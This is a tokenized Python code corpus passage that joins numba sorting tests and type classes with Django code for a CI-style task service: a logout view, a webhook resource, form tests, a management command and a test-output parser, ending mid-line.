check_merge_lo_hi ( f_hi , b , a ) <EOL> def check_merge_at ( self , a , b ) : <EOL> f = self . timsort . merge_at <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> stack_sentinel = MergeRun ( - <NUM_LIT> , - <NUM_LIT> ) <EOL> def run_merge_at ( ms , keys , i ) : <EOL> new_ms = f ( ms , keys , keys , i ) <EOL> self . assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> self . assertIs ( new_ms . pending , ms . pending ) <EOL> self . assertEqual ( ms . pending [ i ] , ( ssa , na + nb ) ) <EOL> self . assertEqual ( ms . pending [ <NUM_LIT:0> ] , stack_sentinel ) <EOL> return new_ms <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> ms = self . timsort . merge_append ( ms , stack_sentinel ) <EOL> i = ms . n <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssa , na ) ) <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssb , nb ) ) <EOL> ms = run_merge_at ( ms , keys , i ) <EOL> self . assertEqual ( ms . n , i + <NUM_LIT:1> ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> ms = self . timsort . merge_append ( ms , stack_sentinel ) <EOL> i = ms . n <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssa , na ) ) <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( ssb , nb ) ) <EOL> last_run = MergeRun ( ssb + nb , <NUM_LIT:1> ) <EOL> ms = self . timsort . merge_append ( ms , last_run ) <EOL> ms = run_merge_at ( ms , keys , i ) <EOL> self . assertEqual ( ms . n , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( ms . pending [ ms . n - <NUM_LIT:1> ] , last_run ) <EOL> def test_merge_at ( self ) : <EOL> for ( na , nb ) in [ ( <NUM_LIT:12> , <NUM_LIT:16> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] : <EOL> for a , b in itertools . product ( self . make_sample_sorted_lists ( na ) , <EOL> self . make_sample_sorted_lists ( nb ) ) : <EOL> self . check_merge_at ( a , b ) <EOL> self . check_merge_at ( b , a ) <EOL> def test_merge_force_collapse ( self ) : <EOL> f = self . timsort . merge_force_collapse <EOL> sizes_list = [ ( <NUM_LIT:8> , <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> ) ] <EOL> sizes_list . append ( sizes_list [ <NUM_LIT:0> ] [ : : - <NUM_LIT:1> ] ) <EOL> for sizes in sizes_list : <EOL> for chunks in itertools . product ( * ( self . make_sample_sorted_lists ( n ) <EOL> for n in sizes ) ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> pos = <NUM_LIT:0> <EOL> for c in chunks : <EOL> ms = self . timsort . merge_append ( ms , MergeRun ( pos , len ( c ) ) ) <EOL> pos += len ( c ) <EOL> self . assertEqual ( sum ( ms . pending [ ms . n - <NUM_LIT:1> ] ) , len ( keys ) ) <EOL> ms = f ( ms , keys , keys ) <EOL> self . assertEqual ( ms . n , <NUM_LIT:1> ) <EOL> self . assertEqual ( ms . pending [ <NUM_LIT:0> ] , MergeRun ( <NUM_LIT:0> , len ( keys ) ) ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_timsort ( self ) : <EOL> f = self . timsort . run_timsort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:30> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_timsort_with_values ( self ) : <EOL> f = self . timsort . run_timsort_with_values <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> chunk_size = <NUM_LIT> * size_factor <EOL> a = self . dupsorted_list ( chunk_size ) <EOL> b = self . duprandom_list ( chunk_size ) <EOL> c = self . revsorted_list ( chunk_size ) <EOL> orig_keys = a + b + c <EOL> orig_values = list ( range ( <NUM_LIT:1000> , <NUM_LIT:1000> + len ( orig_keys ) ) ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> values = self . array_factory ( orig_values ) <EOL> f ( keys , values ) <EOL> self . assertSortedValues ( orig_keys , orig_values , keys , values ) <EOL> class TestTimsortPurePython ( BaseTimsortTest , TestCase ) : <EOL> timsort = py_list_timsort <EOL> array_factory = list <EOL> class TestTimsortArraysPurePython ( BaseTimsortTest , TestCase ) : <EOL> timsort = py_array_timsort <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . int32 ) <EOL> class JITTimsortMixin ( object ) : <EOL> timsort = jit_array_timsort <EOL> test_merge_at = None <EOL> test_merge_force_collapse = None <EOL> def wrap_with_mergestate ( self , timsort , func , _cache = { } ) : <EOL> """<STR_LIT>""" <EOL> key = timsort , func <EOL> if key in _cache : <EOL> return _cache [ key ] <EOL> merge_init = timsort . merge_init <EOL> @ timsort . compile <EOL> def wrapper ( keys , values , * args ) : <EOL> ms = merge_init ( keys ) <EOL> res = func ( ms , keys , values , * args ) <EOL> return res <EOL> _cache [ key ] = wrapper <EOL> return wrapper <EOL> class TestTimsortArrays ( JITTimsortMixin , BaseTimsortTest , TestCase ) : <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . int32 ) <EOL> def check_merge_lo_hi ( self , func , a , b ) : <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> func = self . wrap_with_mergestate ( self . timsort , func ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> keys = self . array_factory ( orig_keys ) <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> new_ms = func ( keys , keys , ssa , na , ssb , nb ) <EOL> self . assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> class BaseQuicksortTest ( BaseSortingTest ) : <EOL> def test_insertion_sort ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> self . assertSorted ( l , res [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> f = self . quicksort . insertion_sort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_partition ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> index = f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> pivot = res [ index ] <EOL> for i in range ( <NUM_LIT:1> , index ) : <EOL> self . assertLessEqual ( res [ i ] , pivot ) <EOL> for i in range ( index + <NUM_LIT:1> , n ) : <EOL> self . assertGreaterEqual ( res [ i ] , pivot ) <EOL> f = self . quicksort . partition <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_partition3 ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n ) : <EOL> res = self . array_factory ( [ <NUM_LIT> ] + l + [ - <NUM_LIT> ] ) <EOL> lt , gt = f ( res , <NUM_LIT:1> , n ) <EOL> self . assertEqual ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . assertEqual ( res [ - <NUM_LIT:1> ] , - <NUM_LIT> ) <EOL> pivot = res [ lt ] <EOL> for i in range ( <NUM_LIT:1> , lt ) : <EOL> self . assertLessEqual ( res [ i ] , pivot ) <EOL> for i in range ( lt , gt + <NUM_LIT:1> ) : <EOL> self . assertEqual ( res [ i ] , pivot ) <EOL> for i in range ( gt + <NUM_LIT:1> , n ) : <EOL> self . assertGreater ( res [ i ] , pivot ) <EOL> f = self . quicksort . partition3 <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_run_quicksort ( self ) : <EOL> f = self . quicksort . run_quicksort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys ) <EOL> def test_run_quicksort_lt ( self ) : <EOL> def lt ( a , b ) : <EOL> return a > b <EOL> f = self . make_quicksort ( lt = lt ) . run_quicksort <EOL> for size_factor in ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> sizes = ( <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> all_lists = [ self . make_sample_lists ( n * size_factor ) for n in sizes ] <EOL> for chunks in itertools . product ( * all_lists ) : <EOL> orig_keys = sum ( chunks , [ ] ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> self . assertSorted ( orig_keys , keys [ : : - <NUM_LIT:1> ] ) <EOL> def lt_floats ( a , b ) : <EOL> return math . isnan ( b ) or a < b <EOL> f = self . make_quicksort ( lt = lt_floats ) . run_quicksort <EOL> np . random . seed ( <NUM_LIT> ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> orig_keys = list ( orig ) <EOL> keys = self . array_factory ( orig_keys ) <EOL> f ( keys ) <EOL> non_nans = orig [ ~ np . isnan ( orig ) ] <EOL> self . assertSorted ( non_nans , keys [ : len ( non_nans ) ] ) <EOL> class TestQuicksortPurePython ( BaseQuicksortTest , TestCase ) : <EOL> quicksort = py_quicksort <EOL> make_quicksort = staticmethod ( make_py_quicksort ) <EOL> array_factory = list <EOL> class TestQuicksortArrays ( BaseQuicksortTest , TestCase ) : <EOL> quicksort = jit_quicksort <EOL> make_quicksort = staticmethod ( make_jit_quicksort ) <EOL> def array_factory ( self , lst ) : <EOL> return np . array ( lst , dtype = np . float64 ) <EOL> class TestNumpySort ( TestCase ) : <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> def check_sort_inplace ( self , pyfunc , cfunc , val ) : <EOL> expected = copy . copy ( val ) <EOL> got = copy . copy ( val ) <EOL> pyfunc ( expected ) <EOL> cfunc ( got ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> def check_sort_copy ( self , pyfunc , cfunc , val ) : <EOL> orig = copy . copy ( val ) <EOL> expected = pyfunc ( val ) <EOL> got = cfunc ( val ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . assertPreciseEqual ( val , orig ) <EOL> def test_array_sort_int ( self ) : <EOL> pyfunc = sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . randint ( <NUM_LIT> , size = size ) <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_array_sort_float ( self ) : <EOL> pyfunc = sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> def test_np_sort_int ( self ) : <EOL> pyfunc = np_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . randint ( <NUM_LIT> , size = size ) <EOL> self . check_sort_copy ( pyfunc , cfunc , orig ) <EOL> def test_np_sort_float ( self ) : <EOL> pyfunc = np_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> self . check_sort_copy ( pyfunc , cfunc , orig ) <EOL> class TestPythonSort ( TestCase ) : <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_list_sort ( self ) : <EOL> pyfunc = list_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig , ret = cfunc ( size ) <EOL> self . assertEqual ( sorted ( orig ) , ret ) <EOL> self . assertNotEqual ( orig , ret ) <EOL> def test_list_sort_reverse ( self ) : <EOL> pyfunc = list_sort_reverse_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> for b in ( False , True ) : <EOL> orig , ret = cfunc ( size , b ) <EOL> self . assertEqual ( sorted ( orig , reverse = b ) , ret ) <EOL> self . assertNotEqual ( orig , ret ) <EOL> def test_sorted ( self ) : <EOL> pyfunc = sorted_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> expected = sorted ( orig ) <EOL> got = cfunc ( orig ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . assertNotEqual ( list ( orig ) , got ) <EOL> def test_sorted_reverse ( self ) : <EOL> pyfunc = sorted_reverse_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> size = <NUM_LIT:20> <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> for b in ( False , True ) : <EOL> expected = sorted ( orig , reverse = b ) <EOL> got = cfunc ( orig , b ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . assertNotEqual ( list ( orig ) , got ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> from abc import ABCMeta , abstractmethod , abstractproperty <EOL> import itertools <EOL> import weakref <EOL> import numpy <EOL> from . . six import add_metaclass <EOL> from . . utils import cached_property <EOL> _typecodes = itertools . count ( ) <EOL> def _autoincr ( ) : <EOL> n = next ( _typecodes ) <EOL> assert n < <NUM_LIT:2> ** <NUM_LIT:32> , "<STR_LIT>" <EOL> return n <EOL> _typecache = { } <EOL> def _on_type_disposal ( wr , _pop = _typecache . pop ) : <EOL> _pop ( wr , None ) <EOL> class _TypeMetaclass ( ABCMeta ) : <EOL> """<STR_LIT>""" <EOL> def _intern ( cls , inst ) : <EOL> wr = weakref . ref ( inst , _on_type_disposal ) <EOL> orig = _typecache . get ( wr ) <EOL> orig = orig and orig ( ) <EOL> if orig is not None : <EOL> return orig <EOL> else : <EOL> inst . _code = _autoincr ( ) <EOL> _typecache [ wr ] = wr <EOL> return inst <EOL> def __call__ ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> inst = type . __call__ ( cls , * args , ** kwargs ) <EOL> return cls . _intern ( inst ) <EOL> def _type_reconstructor ( reconstructor , reconstructor_args , state ) : <EOL> """<STR_LIT>""" <EOL> obj = reconstructor ( * reconstructor_args ) <EOL> if state : <EOL> obj . __dict__ . update ( state ) <EOL> return type ( obj ) . _intern ( obj ) <EOL> @ add_metaclass ( _TypeMetaclass ) <EOL> class Type ( object ) : <EOL> """<STR_LIT>""" <EOL> mutable = False <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ property <EOL> def key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . name <EOL> def __repr__ ( self ) : <EOL> return self . name <EOL> def __hash__ ( self ) : <EOL> return hash ( self . key ) <EOL> def __eq__ ( self , other ) : <EOL> return self . __class__ is other . __class__ and self . key == other . key <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> def __reduce__ ( self ) : <EOL> reconstructor , args , state = super ( Type , self ) . __reduce__ ( ) <EOL> return ( _type_reconstructor , ( reconstructor , args , state ) ) <EOL> def unify ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def can_convert_to ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def can_convert_from ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_precise ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def augment ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def __call__ ( self , * args ) : <EOL> from . . typing import signature <EOL> if len ( args ) == <NUM_LIT:1> and not isinstance ( args [ <NUM_LIT:0> ] , Type ) : <EOL> return self . cast_python_value ( args [ <NUM_LIT:0> ] ) <EOL> return signature ( self , <EOL> * args ) <EOL> def __getitem__ ( self , args ) : <EOL> """<STR_LIT>""" <EOL> from . import Array <EOL> ndim , layout = self . _determine_array_spec ( args ) <EOL> return Array ( dtype = self , ndim = ndim , layout = layout ) <EOL> def _determine_array_spec ( self , args ) : <EOL> if isinstance ( args , ( tuple , list ) ) : <EOL> ndim = len ( args ) <EOL> if args [ <NUM_LIT:0> ] . step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:F>' <EOL> elif args [ - <NUM_LIT:1> ] . step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:C>' <EOL> else : <EOL> layout = '<STR_LIT:A>' <EOL> elif isinstance ( args , slice ) : <EOL> ndim = <NUM_LIT:1> <EOL> if args . step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:C>' <EOL> else : <EOL> layout = '<STR_LIT:A>' <EOL> else : <EOL> ndim = <NUM_LIT:1> <EOL> layout = '<STR_LIT:A>' <EOL> return ndim , layout <EOL> def cast_python_value ( self , args ) : <EOL> raise NotImplementedError <EOL> class Dummy ( Type ) : <EOL> """<STR_LIT>""" <EOL> class Hashable ( Type ) : <EOL> """<STR_LIT>""" <EOL> class Number ( Hashable ) : <EOL> """<STR_LIT>""" <EOL> def unify ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> from . . import numpy_support <EOL> if isinstance ( other , Number ) : <EOL> a = numpy_support . as_dtype ( self ) <EOL> b = numpy_support . as_dtype ( other ) <EOL> sel = numpy . promote_types ( a , b ) <EOL> return numpy_support . from_dtype ( sel ) <EOL> class Callable ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_call_type ( self , context , args , kws ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_call_signatures ( self ) : <EOL> """<STR_LIT>""" <EOL> class DTypeSpec ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractproperty <EOL> def dtype ( self ) : <EOL> """<STR_LIT>""" <EOL> class IterableType ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractproperty <EOL> def iterator_type ( self ) : <EOL> """<STR_LIT>""" <EOL> class IteratorType ( IterableType ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , ** kwargs ) : <EOL> super ( IteratorType , self ) . __init__ ( name , ** kwargs ) <EOL> @ abstractproperty <EOL> def yield_type ( self ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def iterator_type ( self ) : <EOL> return self <EOL> class Container ( IterableType ) : <EOL> """<STR_LIT>""" <EOL> class Sequence ( Container ) : <EOL> """<STR_LIT>""" <EOL> class MutableSequence ( Sequence ) : <EOL> """<STR_LIT>""" <EOL> class ArrayCompatible ( Type ) : <EOL> """<STR_LIT>""" <EOL> array_priority = <NUM_LIT:0.0> <EOL> @ abstractproperty <EOL> def as_array ( self ) : <EOL> """<STR_LIT>""" <EOL> @ cached_property <EOL> def ndim ( self ) : <EOL> return self . as_array . ndim <EOL> @ cached_property <EOL> def layout ( self ) : <EOL> return self . as_array . layout <EOL> @ cached_property <EOL> def dtype ( self ) : <EOL> return self . as_array . dtype </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import warnings <EOL> from . import config <EOL> from numba . config import PYVERSION <EOL> from unittest import * </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import redirect <EOL> from django . contrib . auth import logout <EOL> def logout_with_redirect ( request ) : <EOL> """<STR_LIT>""" <EOL> logout ( request ) <EOL> return redirect ( reverse ( '<STR_LIT>' ) ) </s>
<s> from django . http import Http404 <EOL> from django . conf import settings <EOL> from django_rq import enqueue <EOL> from tastypie . resources import Resource <EOL> from tastypie import fields <EOL> from projects . models import Project <EOL> from . models import NodeTask <EOL> from . jobs import run_node_task <EOL> from . utils import logger <EOL> class NodeTaskHookResource ( Resource ) : <EOL> """<STR_LIT>""" <EOL> before = fields . CharField ( ) <EOL> after = fields . CharField ( ) <EOL> ref = fields . CharField ( ) <EOL> commits = fields . ListField ( ) <EOL> repository = fields . DictField ( ) <EOL> class Meta : <EOL> allowed_methods = [ '<STR_LIT>' ] <EOL> resource_name = '<STR_LIT>' <EOL> def obj_create ( self , bundle , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' . format ( bundle . data [ '<STR_LIT>' ] ) ) <EOL> project = self . _get_project ( bundle ) <EOL> self . _create_task ( bundle , project ) <EOL> def _create_task ( self , bundle , project ) : <EOL> """<STR_LIT>""" <EOL> task = NodeTask . objects . create ( <EOL> project = project , <EOL> revision = bundle . data [ '<STR_LIT>' ] , <EOL> branch = self . _get_branch ( bundle . data [ '<STR_LIT>' ] ) , <EOL> ) <EOL> enqueue ( <EOL> run_node_task , args = ( task . id , ) , <EOL> timeout = settings . NODE_MAX_WAIT_TIME , <EOL> ) <EOL> def _get_project ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> project_name = '<STR_LIT>' . format ( <EOL> bundle . data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> bundle . data [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> ) <EOL> try : <EOL> return Project . objects . get ( <EOL> name = project_name , is_enabled = True , run_here = True , <EOL> ) <EOL> except Project . DoesNotExist : <EOL> logger . warning ( <EOL> '<STR_LIT>' . <EOL> format ( project_name ) , <EOL> ) <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> def _get_branch ( self , ref ) : <EOL> """<STR_LIT>""" <EOL> return ref . replace ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import sure <EOL> from django . test import TestCase <EOL> from tools . mongo import MongoFlushMixin <EOL> from tasks . exceptions import TaskDoesNotExists <EOL> from tasks . models import Tasks <EOL> from tasks . const import STATUS_SUCCESS , STATUS_FAILED <EOL> from . . forms import FindTaskForBadgeForm <EOL> from . import factories <EOL> from tools . tests import MockGithubMixin <EOL> class FindTaskForBadgeFormCase ( MockGithubMixin , MongoFlushMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> mongo_flush = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( FindTaskForBadgeFormCase , self ) . setUp ( ) <EOL> self . project = factories . ProjectFactory ( ) <EOL> def _get_form ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . project . name , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> form = FindTaskForBadgeForm ( defaults ) <EOL> form . is_valid ( ) . should . be . true <EOL> return form <EOL> def _create_task ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . project . name , <EOL> '<STR_LIT:status>' : STATUS_SUCCESS , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Tasks . save ( defaults ) <EOL> def test_task_not_found ( self ) : <EOL> """<STR_LIT>""" <EOL> form = self . _get_form ( ) <EOL> form . get_task . when . called_with ( ) . should . throw ( TaskDoesNotExists ) <EOL> def test_find_by_project ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( ) <EOL> form = self . _get_form ( ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . equal ( STATUS_SUCCESS ) <EOL> def test_find_by_commit ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( status = STATUS_FAILED , commit = { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> for n in range ( <NUM_LIT:10> ) : <EOL> self . _create_task ( commit = { '<STR_LIT>' : '<STR_LIT>' . format ( n ) } ) <EOL> form = self . _get_form ( commit = '<STR_LIT:test>' ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . equal ( STATUS_FAILED ) <EOL> def test_find_by_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( status = STATUS_FAILED , commit = { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> for n in range ( <NUM_LIT:10> ) : <EOL> self . _create_task ( commit = { '<STR_LIT>' : '<STR_LIT>' . format ( n ) } ) <EOL> form = self . _get_form ( branch = '<STR_LIT:test>' ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . equal ( STATUS_FAILED ) </s>
<s> from pymongo import ASCENDING <EOL> from django . core . management . base import BaseCommand <EOL> from tasks . models import Tasks <EOL> from tasks . jobs import create_task <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** kwargs ) : <EOL> for task in Tasks . find ( { } , sort = [ ( '<STR_LIT>' , ASCENDING ) ] ) : <EOL> try : <EOL> create_task ( task [ '<STR_LIT>' ] ) <EOL> except Exception as e : <EOL> print e </s>
<s> import re <EOL> from django . template . loader import render_to_string <EOL> from tasks . const import STATUS_SUCCESS , STATUS_FAILED <EOL> from . base import library <EOL> @ library . register ( '<STR_LIT>' ) <EOL> def testem_violation ( data ) : <EOL> """<STR_LIT>""" <EOL> lines = data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> runs = [ ] <EOL> tests = <NUM_LIT:0> <EOL> pass_ = <NUM_LIT:0> <EOL> fail = <NUM_LIT:0> <EOL> not_ok = False <EOL> for line in lines : <EOL> ok_match = re . match ( r'<STR_LIT>' , line ) <EOL> if ok_match : <EOL> runs . append ( ok_match . groups ( ) + ( [ ] , ) ) <EOL> if ok_match . groups ( ) [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> not_ok = True <EOL> if not len ( line ) : <EOL> not_ok = False <EOL> if not_ok and line . find ( '<STR_LIT:U+0020>' ) == <NUM_LIT:0> : <EOL> runs [ - <NUM_LIT:1> ] [ - <NUM_LIT:1> ] . append ( line [ <NUM_LIT:8> : ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> tests = int ( line . split 